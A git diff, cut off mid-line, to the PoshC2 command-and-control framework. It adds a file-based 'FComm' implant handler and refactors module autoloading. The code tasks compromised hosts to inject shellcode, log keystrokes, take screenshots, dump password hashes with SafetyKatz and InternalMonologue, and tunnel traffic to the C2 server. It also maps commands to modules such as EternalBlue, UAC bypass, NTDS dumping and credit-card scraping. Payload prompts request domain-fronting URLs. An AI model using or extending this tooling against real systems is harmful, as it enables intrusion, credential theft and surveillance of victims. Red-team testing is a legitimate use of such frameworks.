diff --git a/.gitignore b/.gitignore index fa95d406..c8651ad6 100644 --- a/.gitignore +++ b/.gitignore @@ -93,3 +93,6 @@ ENV/ # VSCode .vscode/ + +# VStudio +.vs/ diff --git a/poshc2/Colours.py b/poshc2/Colours.py index 6738e321..443a4e10 100644 --- a/poshc2/Colours.py +++ b/poshc2/Colours.py @@ -4,3 +4,4 @@ class Colours: RED = '\033[91m' END = '\033[0m' YELLOW = '\033[93m' + PURPLE = '\033[1;35m' diff --git a/poshc2/client/Help.py b/poshc2/client/Help.py index de6bcbce..5bdda4c5 100644 --- a/poshc2/client/Help.py +++ b/poshc2/client/Help.py @@ -221,6 +221,8 @@ sharpsc SERVER01 service "cmd /c rundll32.exe test.dll,Ep" domain username password pbind-connect hostname pbind-connect hostname +fcomm-connect +fcomm-connect filepath * Lateral Movement with Pre-Built Payload: =========================================== diff --git a/poshc2/client/command_handlers/FCommHandler.py b/poshc2/client/command_handlers/FCommHandler.py new file mode 100644 index 00000000..1e2d495b --- /dev/null +++ b/poshc2/client/command_handlers/FCommHandler.py @@ -0,0 +1,262 @@ +import base64, re, traceback, os, string, sys +from prompt_toolkit import PromptSession +from prompt_toolkit.history import FileHistory +from prompt_toolkit.auto_suggest import AutoSuggestFromHistory +from prompt_toolkit.styles import Style + +from poshc2.client.Alias import cs_alias, cs_replace +from poshc2.Colours import Colours +from poshc2.Utils import validate_sleep_time, argp, load_file, gen_key +from poshc2.server.AutoLoads import check_module_loaded, run_autoloads_sharp +from poshc2.client.Help import sharp_help +from poshc2.server.Config import PoshInstallDirectory, PoshProjectDirectory, SocksHost, PayloadsDirectory +from poshc2.server.Core import print_bad +from poshc2.client.cli.CommandPromptCompleter import FilePathCompleter +from poshc2.server.PowerStatus import getpowerstatus +from poshc2.server.database.DB import new_task, unhide_implant, kill_implant, get_implantdetails, get_sharpurls +from poshc2.server.database.DB import select_item, new_c2_message, get_powerstatusbyrandomuri, update_label, get_randomuri + + +def handle_fcomm_command(command, user, randomuri, implant_id): + + # convert randomuri to parent randomuri + oldrandomuri = randomuri + p = get_implantdetails(randomuri) + newimplant_id = re.search(r'(?<=\s)\S*', p.Label).group() + if newimplant_id is not None: + randomuri = get_randomuri(newimplant_id) + + # alias mapping + for alias in cs_alias: + if alias[0] == command[:len(command.rstrip())]: + command = alias[1] + + # alias replace + for alias in cs_replace: + if command.startswith(alias[0]): + command = command.replace(alias[0], alias[1]) + + original_command = command + command = command.strip() + + run_autoloads_sharp(command, randomuri, user, loadmodule_command="fcomm-loadmodule") + + if command.startswith("searchhistory"): + searchterm = (command).replace("searchhistory ", "") + with open('%s/.implant-history' % PoshProjectDirectory) as hisfile: + for line in hisfile: + if searchterm in line.lower(): + print(Colours.PURPLE + line.replace("+", "")) + + elif command.startswith("searchhelp"): + searchterm = (command).replace("searchhelp ", "") + helpful = sharp_help.split('\n') + for line in helpful: + if searchterm in line.lower(): + print(Colours.PURPLE + line) + + elif command.startswith("upload-file"): + source = "" + destination = "" + if command == "upload-file": + style = Style.from_dict({ + '': '#772953', + }) + session = PromptSession(history=FileHistory('%s/.upload-history' % PoshProjectDirectory), auto_suggest=AutoSuggestFromHistory(), style=style) + try: + source = session.prompt("Location file to upload: ", completer=FilePathCompleter(PayloadsDirectory, glob="*")) + source = PayloadsDirectory + source + except KeyboardInterrupt: + return + while not os.path.isfile(source): + print("File does not exist: %s" % source) + source = session.prompt("Location file to upload: ", completer=FilePathCompleter(PayloadsDirectory, glob="*")) + source = PayloadsDirectory + source + destination = session.prompt("Location to upload to: ") + else: + args = argp(command) + source = args.source + destination = args.destination + try: + destination = destination.replace("\\", "\\\\") + print("") + print("Uploading %s to %s" % (source, destination)) + uploadcommand = f"upload-file {source} {destination}" + new_task(f"fcomm-command {uploadcommand}", user, randomuri) + except Exception as e: + print_bad("Error with source file: %s" % e) + traceback.print_exc() + + elif command.startswith("unhide-implant"): + unhide_implant(oldrandomuri) + + elif command.startswith("hide-implant"): + kill_implant(oldrandomuri) + + elif command.startswith("inject-shellcode"): + params = re.compile("inject-shellcode", re.IGNORECASE) + params = params.sub("", command) + style = Style.from_dict({ + '': '#772953', + }) + session = PromptSession(history=FileHistory('%s/.shellcode-history' % PoshProjectDirectory), auto_suggest=AutoSuggestFromHistory(), style=style) + try: + path = session.prompt("Location of shellcode file: ", completer=FilePathCompleter(PayloadsDirectory, glob="*.bin")) + path = PayloadsDirectory + path + except KeyboardInterrupt: + return + try: + shellcodefile = load_file(path) + if shellcodefile is not None: + new_task("fcomm-command run-exe Core.Program Core Inject-Shellcode %s%s #%s" % (base64.b64encode(shellcodefile).decode("utf-8"), params, os.path.basename(path)), user, randomuri) + except Exception as e: + print("Error loading file: %s" % e) + + elif command.startswith("migrate"): + params = re.compile("migrate", re.IGNORECASE) + params = params.sub("", command) + migrate(randomuri, user, params) + + elif command == "kill-implant" or command == "exit": + impid = get_implantdetails(randomuri) + ri = input("Are you sure you want to terminate the implant ID %s? (Y/n) " % impid.ImplantID) + if ri.lower() == "n": + print("Implant not terminated") + if ri == "" or ri.lower() == "y": + new_task("fcomm-kill", user, randomuri) + kill_implant(oldrandomuri) + + elif command == "sharpsocks": + from random import choice + allchar = string.ascii_letters + channel = "".join(choice(allchar) for x in range(25)) + sharpkey = gen_key().decode("utf-8") + sharpurls = get_sharpurls() + sharpurls = sharpurls.split(",") + sharpurl = select_item("HostnameIP", "C2Server") + print(PoshInstallDirectory + "SharpSocks/SharpSocksServerCore -c=%s -k=%s --verbose -l=%s\r\n" % (channel, sharpkey, SocksHost) + Colours.PURPLE) + ri = input("Are you ready to start the SharpSocks in the implant? (Y/n) ") + if ri.lower() == "n": + print("") + if ri == "": + new_task("fcomm-command run-exe SharpSocksImplantTestApp.Program SharpSocks -s %s -c %s -k %s -url1 %s -url2 %s -b 2000 --session-cookie ASP.NET_SessionId --payload-cookie __RequestVerificationToken" % (sharpurl, channel, sharpkey, sharpurls[0].replace("\"", ""), sharpurls[1].replace("\"", "")), user, randomuri) + if ri.lower() == "y": + new_task("fcomm-command run-exe SharpSocksImplantTestApp.Program SharpSocks -s %s -c %s -k %s -url1 %s -url2 %s -b 2000 --session-cookie ASP.NET_SessionId --payload-cookie __RequestVerificationToken" % (sharpurl, channel, sharpkey, sharpurls[0].replace("\"", ""), sharpurls[1].replace("\"", "")), user, randomuri) + + elif (command.startswith("stop-keystrokes")): + new_task("fcomm-command run-exe Logger.KeyStrokesClass Logger %s" % command, user, randomuri) + update_label("", randomuri) + + elif (command.startswith("start-keystrokes")): + check_module_loaded("Logger.exe", randomuri, user) + new_task("fcomm-command run-exe Logger.KeyStrokesClass Logger %s" % command, user, randomuri) + update_label("KEYLOG", randomuri) + + elif (command.startswith("get-keystrokes")): + new_task("fcomm-command run-exe Logger.KeyStrokesClass Logger %s" % command, user, randomuri) + + elif (command.startswith("get-screenshotmulti")): + pwrStatus = get_powerstatusbyrandomuri(randomuri) + if (pwrStatus is not None and pwrStatus[7]): + ri = input("[!] Screen is reported as LOCKED, do you still want to attempt a screenshot? (y/N) ") + if ri.lower() == "n" or ri.lower() == "": + return + new_task(f"fcomm-command {command}", user, randomuri) + update_label("SCREENSHOT", randomuri) + + elif (command.startswith("get-screenshot")): + pwrStatus = get_powerstatusbyrandomuri(randomuri) + if (pwrStatus is not None and pwrStatus[7]): + ri = input("[!] Screen is reported as LOCKED, do you still want to attempt a screenshot? (y/N) ") + if ri.lower() == "n" or ri.lower() == "": + return + new_task(f"fcomm-command {command}", user, randomuri) + + elif (command == "get-powerstatus"): + getpowerstatus(randomuri) + new_task("fcomm-command run-dll PwrStatusTracker.PwrFrm PwrStatusTracker GetPowerStatusResult ", user, randomuri) + + elif (command == "getpowerstatus"): + getpowerstatus(randomuri) + new_task("fcomm-command run-dll PwrStatusTracker.PwrFrm PwrStatusTracker GetPowerStatusResult ", user, randomuri) + + elif (command.startswith("stop-powerstatus")): + new_task(f"fcomm-command {command}", user, randomuri) + update_label("", randomuri) + + elif (command.startswith("stoppowerstatus")): + new_task(f"fcomm-command {command}", user, randomuri) + update_label("", randomuri) + + elif (command.startswith("pslo")): + new_task(f"fcomm-{command}", user, randomuri) + + elif (command.startswith("run-exe SharpWMI.Program")) and "execute" in command and "payload" not in command: + style = Style.from_dict({'': '#772953'}) + session = PromptSession(history=FileHistory('%s/.shellcode-history' % PoshProjectDirectory), auto_suggest=AutoSuggestFromHistory(), style=style) + try: + path = session.prompt("Location of base64 vbs/js file: ", completer=FilePathCompleter(PayloadsDirectory, glob="*.b64")) + path = PayloadsDirectory + path + except KeyboardInterrupt: + return + if os.path.isfile(path): + with open(path, "r") as p: + payload = p.read() + new_task("fcomm-command %s payload=%s" % (command, payload), user, randomuri) + else: + print_bad("Could not find file") + + elif (command.startswith("get-hash")): + check_module_loaded("InternalMonologue.exe", randomuri, user) + new_task("fcomm-command run-exe InternalMonologue.Program InternalMonologue", user, randomuri) + + elif (command.startswith("safetykatz")): + new_task("fcomm-command run-exe SafetyKatz.Program %s" % command, user, randomuri) + + elif command.startswith("loadmoduleforce"): + params = re.compile("loadmoduleforce ", re.IGNORECASE) + params = params.sub("", command) + new_task("fcomm-loadmodule %s" % params, user, randomuri) + + elif command.startswith("loadmodule"): + params = re.compile("loadmodule ", re.IGNORECASE) + params = params.sub("", command) + new_task("fcomm-loadmodule %s" % params, user, randomuri) + + elif command.startswith("listmodules"): + modules = os.listdir("%s/Modules/" % PoshInstallDirectory) + modules = sorted(modules, key=lambda s: s.lower()) + print("") + print("[+] Available modules:") + print("") + for mod in modules: + if (".exe" in mod) or (".dll" in mod): + print(mod) + + elif command.startswith("modulesloaded"): + ml = get_implantdetails(randomuri) + print(ml.ModsLoaded) + new_task("fcomm-command listmodules", user, randomuri) + + elif command == "help" or command == "?": + print(sharp_help) + + elif command.startswith("beacon") or command.startswith("set-beacon") or command.startswith("setbeacon"): + new_sleep = command.replace('set-beacon ', '') + new_sleep = new_sleep.replace('setbeacon ', '') + new_sleep = new_sleep.replace('beacon ', '').strip() + if not validate_sleep_time(new_sleep): + print(Colours.RED) + print("Invalid sleep command, please specify a time such as 50s, 10m or 1h") + print(Colours.PURPLE) + else: + new_task(f"fcomm-command {command}", user, randomuri) + + else: + if command: + new_task(f"fcomm-command {original_command}", user, randomuri) + return + + +def migrate(randomuri, user, params=""): + print("Do not use migrate when in a fcomm implant - use Inject-Shellcode") diff --git a/poshc2/client/command_handlers/ImplantHandler.py b/poshc2/client/command_handlers/ImplantHandler.py index 193542fa..f4aa0cda 100644 --- a/poshc2/client/command_handlers/ImplantHandler.py +++ b/poshc2/client/command_handlers/ImplantHandler.py @@ -10,7 +10,7 @@ from poshc2.client.Help import SERVER_COMMANDS, PY_COMMANDS, SHARP_COMMANDS, POSH_COMMANDS, server_help from poshc2.Colours import Colours from poshc2.server.Config import PayloadsDirectory, PoshProjectDirectory, ReportsDirectory, ModulesDirectory, Database, DatabaseType -from poshc2.server.Config import PBindPipeName, PBindSecret, PayloadCommsHost, DomainFrontHeader +from poshc2.server.Config import PBindPipeName, PBindSecret, PayloadCommsHost, DomainFrontHeader, FCommFileName from poshc2.server.Core import get_creds_from_params, print_good, print_bad, number_of_days from poshc2.client.reporting.HTML import generate_html_table, graphviz from poshc2.client.reporting.CSV import generate_csv @@ -21,6 +21,7 @@ from poshc2.client.command_handlers.PSHandler import handle_ps_command from poshc2.client.command_handlers.PbindHandler import handle_pbind_command from poshc2.client.command_handlers.PbindPivotHandler import handle_pbind_pivot_command +from poshc2.client.command_handlers.FCommHandler import handle_fcomm_command from poshc2.client.cli.CommandPromptCompleter import FirstWordFuzzyWordCompleter from poshc2.client.Help import banner from poshc2.server.database.DBType import DBType @@ -54,6 +55,8 @@ def get_implant_type_prompt_prefix(implant_id): pivot = pivot + ";P" if "PBind" in pivot_original: pivot = pivot + ";PB" + if "FComm" in pivot_original: + pivot = pivot + ";FC" return pivot @@ -145,6 +148,8 @@ def implant_handler_command_loop(user, printhelp="", autohide=None): if "C#;PB" in Pivot: print(Colours.BLUE + "%s: Seen:%s | PID:%s | %s | PBind | %s\\%s @ %s (%s) %s %s" % (sID.ljust(4), LastSeenTimeString, PID.ljust(5), Sleep, Domain, DomainUser, Hostname, Arch, Pivot, sLabel)) + elif "C#;FC" in Pivot: + print(Colours.PURPLE + "%s: Seen:%s | PID:%s | %s | FComm | %s\\%s @ %s (%s) %s %s" % (sID.ljust(4), LastSeenTimeString, PID.ljust(5), Sleep, Domain, DomainUser, Hostname, Arch, Pivot, sLabel)) elif nowMinus30Beacons > LastSeenTime and autohide: pass elif nowMinus10Beacons > LastSeenTime: @@ -345,6 +350,9 @@ def run_implant_command(command, randomuri, implant_id, user): elif implant_type.startswith("C# PBind"): handle_pbind_command(command, user, randomuri, implant_id) return + elif implant_type.startswith("C# FComm"): + handle_fcomm_command(command, user, randomuri, implant_id) + return elif implant_type.startswith("C#"): handle_sharp_command(command, user, randomuri, implant_id) return @@ -387,6 +395,13 @@ def implant_command_loop(implant_id, user): session = PromptSession(history=FileHistory('%s/.implant-history' % PoshProjectDirectory), auto_suggest=AutoSuggestFromHistory(), style=style) prompt_commands = SHARP_COMMANDS print(Colours.BLUE) + if 'FC' in implant.Pivot: + style = Style.from_dict({ + '': '#772953', + }) + session = PromptSession(history=FileHistory('%s/.implant-history' % PoshProjectDirectory), auto_suggest=AutoSuggestFromHistory(), style=style) + prompt_commands = SHARP_COMMANDS + print(Colours.PURPLE) else: print(Colours.GREEN) print("%s\\%s @ %s (PID:%s)" % (implant.Domain, implant.User, implant.Hostname, implant.PID)) @@ -610,9 +625,9 @@ def do_show_hosted_files(user, command): def do_add_hosted_file(user, command): - FilePath = input("File Path: .e.g. /tmp/application.docx: ") - URI = input("URI Path: .e.g. /downloads/2020/application: ") - ContentType = input("Content Type: .e.g. (text/html): ") + FilePath = input("File Path (e.g. /tmp/application.docx): ") + URI = input("URI Path (e.g. /downloads/2020/application): ") + ContentType = input("Content Type (e.g. text/html): ") if ContentType == "": ContentType = "text/html" Base64 = no_yes_prompt("Base64 Encode File") @@ -961,6 +976,7 @@ def do_createdaisypayload(user, command): proxynone = "if (!$proxyurl){$wc.Proxy = [System.Net.GlobalProxySelection]::GetEmptyWebProxy()}" pbindsecret = PBindSecret pbindpipename = PBindPipeName + fcomm_filename = FCommFileName daisyurl, daisyurl_count = string_to_array(daisyurl) daisyhostheader = "" @@ -977,7 +993,7 @@ def do_createdaisypayload(user, command): C2 = get_c2server_all() urlId = new_urldetails(name, C2.PayloadCommsHost, C2.DomainFrontHeader, "", "", "", "") newPayload = Payloads(C2.KillDate, C2.EncKey, C2.Insecure, C2.UserAgent, C2.Referrer, - "%s?d" % get_newimplanturl(), PayloadsDirectory, PowerShellProxyCommand=proxynone, URLID=urlId, PBindPipeName=pbindpipename, PBindSecret=pbindsecret) + "%s?d" % get_newimplanturl(), PayloadsDirectory, PowerShellProxyCommand=proxynone, URLID=urlId, PBindPipeName=pbindpipename, PBindSecret=pbindsecret, FCommFileName=fcomm_filename) newPayload.PSDropper = (newPayload.PSDropper).replace("$pid;%s" % (daisyurl), "$pid;%s@%s" % (daisyhost.User, daisyhost.Domain)) newPayload.CreateDroppers("%s_" % name) newPayload.CreateShellcode("%s_" % name) @@ -1005,12 +1021,13 @@ def do_createnewpayload(user, command, creds=None, shellcodeOnly=False): input("Press Enter to continue...") clear() return - name = input(Colours.GREEN + "Proxy Payload Name: e.g. Scenario_One ") - comms_url = input("Domain or URL in array format: https://www.example.com,https://www.example2.com ") - domainfront = input("Domain front URL in array format: fjdsklfjdskl.cloudfront.net,jobs.azureedge.net ") - proxyurl = input("Proxy URL: .e.g. http://10.150.10.1:8080 ") - pbindsecret = input(f"PBind Secret: e.g {PBindSecret} ") - pbindpipename = input(f"PBind Pipe Name: e.g. {PBindPipeName} ") + name = input(Colours.GREEN + "Proxy Payload Name (e.g. Scenario_One): ") + comms_url = input("Domain or URL in array format (e.g. https://www.example.com,https://www.example2.com): ") + domainfront = input("Domain front URL in array format (e.g. fjdsklfjdskl.cloudfront.net,jobs.azureedge.net): ") + proxyurl = input("Proxy URL (e.g. http://10.150.10.1:8080): ") + pbindsecret = input(f"PBind Secret (e.g {PBindSecret}): ") + pbindpipename = input(f"PBind Pipe Name (e.g. {PBindPipeName}): ") + fcomm_filename = input(f"FComm File Name (e.g. {FCommFileName}): ") if not pbindsecret: pbindsecret = PBindSecret @@ -1018,6 +1035,9 @@ def do_createnewpayload(user, command, creds=None, shellcodeOnly=False): if not pbindpipename: pbindpipename = PBindPipeName + if not fcomm_filename: + fcomm_filename = FCommFileName + comms_url, PayloadCommsHostCount = string_to_array(comms_url) domainfront, DomainFrontHeaderCount = string_to_array(domainfront) if PayloadCommsHostCount == DomainFrontHeaderCount: @@ -1035,16 +1055,16 @@ def do_createnewpayload(user, command, creds=None, shellcodeOnly=False): proxyuser = "%s\\%s" % (creds['Domain'], creds['Username']) proxypass = creds['Password'] else: - proxyuser = input(Colours.GREEN + "Proxy User: e.g. Domain\\user ") - proxypass = input("Proxy Password: e.g. Password1 ") - credsexpire = input(Colours.GREEN + "Password/Account Expiration Date: .e.g. 15/03/2018 ") + proxyuser = input(Colours.GREEN + "Proxy User (e.g. Domain\\user): ") + proxypass = input("Proxy Password (e.g. Password1): ") + credsexpire = input(Colours.GREEN + "Password/Account Expiration Date (e.g. 15/03/2018): ") imurl = "%s?p" % get_newimplanturl() else: imurl = get_newimplanturl() C2 = get_c2server_all() urlId = new_urldetails(name, comms_url, domainfront, proxyurl, proxyuser, proxypass, credsexpire) - newPayload = Payloads(C2.KillDate, C2.EncKey, C2.Insecure, C2.UserAgent, C2.Referrer, imurl, PayloadsDirectory, URLID=urlId, PBindPipeName=pbindpipename, PBindSecret=pbindsecret) + newPayload = Payloads(C2.KillDate, C2.EncKey, C2.Insecure, C2.UserAgent, C2.Referrer, imurl, PayloadsDirectory, URLID=urlId, PBindPipeName=pbindpipename, PBindSecret=pbindsecret, FCommFileName=fcomm_filename) if shellcodeOnly: newPayload.CreateDroppers("%s_" % name) @@ -1081,6 +1101,8 @@ def do_label_implant(user, command, randomuri): implant_type = get_implanttype(randomuri) if "PB" in implant_type: print("Cannot re-label a PBind implant at this time") + elif "FC" in implant_type: + print("Cannot re-label an FComm implant at this time") else: update_label(label, randomuri) diff --git a/poshc2/client/command_handlers/PbindHandler.py b/poshc2/client/command_handlers/PbindHandler.py index 6082257f..5ffe55f2 100644 --- a/poshc2/client/command_handlers/PbindHandler.py +++ b/poshc2/client/command_handlers/PbindHandler.py @@ -39,28 +39,28 @@ def handle_pbind_command(command, user, randomuri, implant_id): original_command = command command = command.strip() - run_autoloads_sharp(command, randomuri, user, isPBind=True, isPBindPivot=False, pbind_randomuri=oldrandomuri) + run_autoloads_sharp(command, randomuri, user, loadmodule_command="pbind-loadmodule") if command.startswith("searchhistory"): searchterm = (command).replace("searchhistory ", "") with open('%s/.implant-history' % PoshProjectDirectory) as hisfile: for line in hisfile: if searchterm in line.lower(): - print(Colours.GREEN + line.replace("+","")) + print(Colours.BLUE + line.replace("+", "")) elif command.startswith("searchhelp"): searchterm = (command).replace("searchhelp ", "") helpful = sharp_help.split('\n') for line in helpful: if searchterm in line.lower(): - print(Colours.GREEN + line) + print(Colours.BLUE + line) elif command.startswith("upload-file"): source = "" destination = "" if command == "upload-file": style = Style.from_dict({ - '': '#80d130', + '': '#008ECC', }) session = PromptSession(history=FileHistory('%s/.upload-history' % PoshProjectDirectory), auto_suggest=AutoSuggestFromHistory(), style=style) try: @@ -97,7 +97,7 @@ def handle_pbind_command(command, user, randomuri, implant_id): params = re.compile("inject-shellcode", re.IGNORECASE) params = params.sub("", command) style = Style.from_dict({ - '': '#80d130', + '': '#008ECC', }) session = PromptSession(history=FileHistory('%s/.shellcode-history' % PoshProjectDirectory), auto_suggest=AutoSuggestFromHistory(), style=style) try: @@ -195,7 +195,7 @@ def handle_pbind_command(command, user, randomuri, implant_id): new_task(f"pbind-{command}", user, randomuri) elif (command.startswith("run-exe SharpWMI.Program")) and "execute" in command and "payload" not in command: - style = Style.from_dict({'': '#80d130'}) + style = Style.from_dict({'': '#008ECC'}) session = PromptSession(history=FileHistory('%s/.shellcode-history' % PoshProjectDirectory), auto_suggest=AutoSuggestFromHistory(), style=style) try: path = session.prompt("Location of base64 vbs/js file: ", completer=FilePathCompleter(PayloadsDirectory, glob="*.b64")) @@ -205,7 +205,7 @@ def handle_pbind_command(command, user, randomuri, implant_id): if os.path.isfile(path): with open(path, "r") as p: payload = p.read() - new_task("pbind-command %s payload=%s" % (command,payload), user, randomuri) + new_task("pbind-command %s payload=%s" % (command, payload), user, randomuri) else: print_bad("Could not find file") @@ -254,7 +254,7 @@ def handle_pbind_command(command, user, randomuri, implant_id): if not validate_sleep_time(new_sleep): print(Colours.RED) print("Invalid sleep command, please specify a time such as 50s, 10m or 1h") - print(Colours.GREEN) + print(Colours.BLUE) else: new_task(f"pbind-command {command}", user, randomuri) @@ -284,4 +284,4 @@ def do_pbind_start(user, command, randomuri): new_task(command, user, randomuri) def migrate(randomuri, user, params=""): - print("Do not use migrate when in a pbind implant - use Inject-Shellcode") \ No newline at end of file + print("Do not use migrate when in a pbind implant - use Inject-Shellcode") diff --git a/poshc2/client/command_handlers/PbindPivotHandler.py b/poshc2/client/command_handlers/PbindPivotHandler.py index 5acbb2ea..814e5eed 100644 --- a/poshc2/client/command_handlers/PbindPivotHandler.py +++ b/poshc2/client/command_handlers/PbindPivotHandler.py @@ -38,8 +38,8 @@ def handle_pbind_pivot_command(command, user, randomuri, implant_id): original_command = command command = command.strip() - - run_autoloads_sharp(command, randomuri, user, isPBind=False, isPBindPivot=True, pbind_randomuri=oldrandomuri) + + run_autoloads_sharp(command, randomuri, user, loadmodule_command="pbind-pivot-loadmodule") if command.startswith("searchhistory"): searchterm = (command).replace("searchhistory ", "") diff --git a/poshc2/client/command_handlers/SharpHandler.py b/poshc2/client/command_handlers/SharpHandler.py index 3ed9bf15..731faa13 100644 --- a/poshc2/client/command_handlers/SharpHandler.py +++ b/poshc2/client/command_handlers/SharpHandler.py @@ -9,7 +9,7 @@ from poshc2.server.AutoLoads import check_module_loaded, run_autoloads_sharp from poshc2.client.Help import sharp_help from poshc2.server.Config import PoshInstallDirectory, PoshProjectDirectory, SocksHost, PayloadsDirectory, ModulesDirectory -from poshc2.server.Config import PayloadCommsHost, DomainFrontHeader, UserAgent, PBindPipeName, PBindSecret +from poshc2.server.Config import PayloadCommsHost, DomainFrontHeader, UserAgent, PBindPipeName, PBindSecret, FCommFileName from poshc2.Utils import argp, load_file, gen_key, get_first_url, get_first_dfheader from poshc2.server.Core import print_bad, print_good from poshc2.client.cli.CommandPromptCompleter import FilePathCompleter @@ -105,6 +105,9 @@ def handle_sharp_command(command, user, randomuri, implant_id): elif command.startswith("pbind-connect"): do_pbind_start(user, command, randomuri) return + elif command.startswith("fcomm-connect"): + do_fcomm_start(user, command, randomuri) + return elif command.startswith("dynamic-code"): do_dynamic_code(user, command, randomuri) return @@ -383,6 +386,18 @@ def do_pbind_start(user, command, randomuri): new_task(command, user, randomuri) +def do_fcomm_start(user, command, randomuri): + key = get_baseenckey() + if len(command.split()) == 1: # 'fcomm-connect' is one args + command = f"{command} {FCommFileName} {key}" + elif len(command.split()) == 2: # if the file name is already there then just add the key + command = f"{command} {key}" + else: + print_bad("Expected 'fcomm_connect' or 'fcomm_connect '") + return + new_task(command, user, randomuri) + + def do_dynamic_code(user, command, randomuri): compile_command = "mono-csc %sDynamicCode.cs -out:%sPoshC2DynamicCode.exe -target:exe -warn:2 -sdk:4" % (PayloadsDirectory, PayloadsDirectory) try: diff --git a/poshc2/server/AutoLoads.py b/poshc2/server/AutoLoads.py index a3ab50e7..3c5ba0e1 100644 --- a/poshc2/server/AutoLoads.py +++ b/poshc2/server/AutoLoads.py @@ -4,25 +4,16 @@ from poshc2.server.database.DB import update_mods, new_task, select_mods -def check_module_loaded(module_name, randomuri, user, force=False, isPBind=False, isPBindPivot=False, pbind_randomuri=None): - if isPBind: - loadmodule_command = "pbind-loadmodule" - implant_randomuri = pbind_randomuri - elif isPBindPivot: - loadmodule_command = "pbind-pivot-loadmodule" - implant_randomuri = pbind_randomuri - else: - loadmodule_command = "loadmodule" - implant_randomuri = randomuri +def check_module_loaded(module_name, randomuri, user, force=False, loadmodule_command="loadmodule"): try: - modules_loaded = select_mods(implant_randomuri) + modules_loaded = select_mods(randomuri) if force: for modname in os.listdir(ModulesDirectory): if modname.lower() == module_name.lower(): module_name = modname new_task(f"{loadmodule_command} {module_name}", user, randomuri) - update_mods(module_name, implant_randomuri) + update_mods(module_name, randomuri) if modules_loaded: new_modules_loaded = "%s %s" % (modules_loaded, module_name) if module_name not in modules_loaded: @@ -30,328 +21,332 @@ def check_module_loaded(module_name, randomuri, user, force=False, isPBind=False if modname.lower() == module_name.lower(): module_name = modname new_task(f"{loadmodule_command} {module_name}", user, randomuri) - update_mods(new_modules_loaded, implant_randomuri) + update_mods(new_modules_loaded, randomuri) else: new_modules_loaded = "%s" % (module_name) new_task(f"{loadmodule_command} {module_name}", user, randomuri) - update_mods(new_modules_loaded, implant_randomuri) + update_mods(new_modules_loaded, randomuri) except Exception as e: print(f"Error: {loadmodule_command} {module_name}: {e}") -def run_autoloads(command, randomuri, user, isPBind=False, isPBindPivot=False): +def run_autoloads(command, randomuri, user, loadmodule_command="loadmodule"): command = command.lower().strip() if command.startswith("invoke-eternalblue"): - check_module_loaded("Exploit-EternalBlue.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Exploit-EternalBlue.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("get-screenshotallwindows"): - check_module_loaded("Get-ScreenshotAllWindows.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Get-ScreenshotAllWindows.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-psuacme"): - check_module_loaded("Invoke-PsUACme.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Invoke-PsUACme.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("invoke-bloodhound"): - check_module_loaded("SharpHound.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("SharpHound.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("brute-ad"): - check_module_loaded("Brute-AD.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Brute-AD.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("brute-locadmin"): - check_module_loaded("Brute-LocAdmin.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Brute-LocAdmin.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("bypass-uac"): - check_module_loaded("Bypass-UAC.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Bypass-UAC.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("cred-popper"): - check_module_loaded("Cred-Popper.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Cred-Popper.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("cve-2016-9192"): - check_module_loaded("CVE-2016-9192.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("CVE-2016-9192.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("convertto-shellcode"): - check_module_loaded("ConvertTo-Shellcode.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("ConvertTo-Shellcode.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("decrypt-rdcman"): - check_module_loaded("Decrypt-RDCMan.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Decrypt-RDCMan.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("dump-ntds"): - check_module_loaded("Dump-NTDS.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Dump-NTDS.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("get-computerinfo"): - check_module_loaded("Get-ComputerInfo.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Get-ComputerInfo.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("get-creditcarddata"): - check_module_loaded("Get-CreditCardData.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Get-CreditCardData.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("get-gppautologon"): - check_module_loaded("Get-GPPAutologon.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Get-GPPAutologon.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("get-gpppassword"): - check_module_loaded("Get-GPPPassword.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Get-GPPPassword.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("get-idletime"): - check_module_loaded("Get-IdleTime.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Get-IdleTime.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif command.startswith("get-ipconfig"): - check_module_loaded("Get-IPConfig.ps1", randomuri, user, isPBind=isPBind, isPBindPivot=isPBindPivot) + check_module_loaded("Get-IPConfig.ps1", randomuri, user, loadmodule_command=loadmodule_command) elif 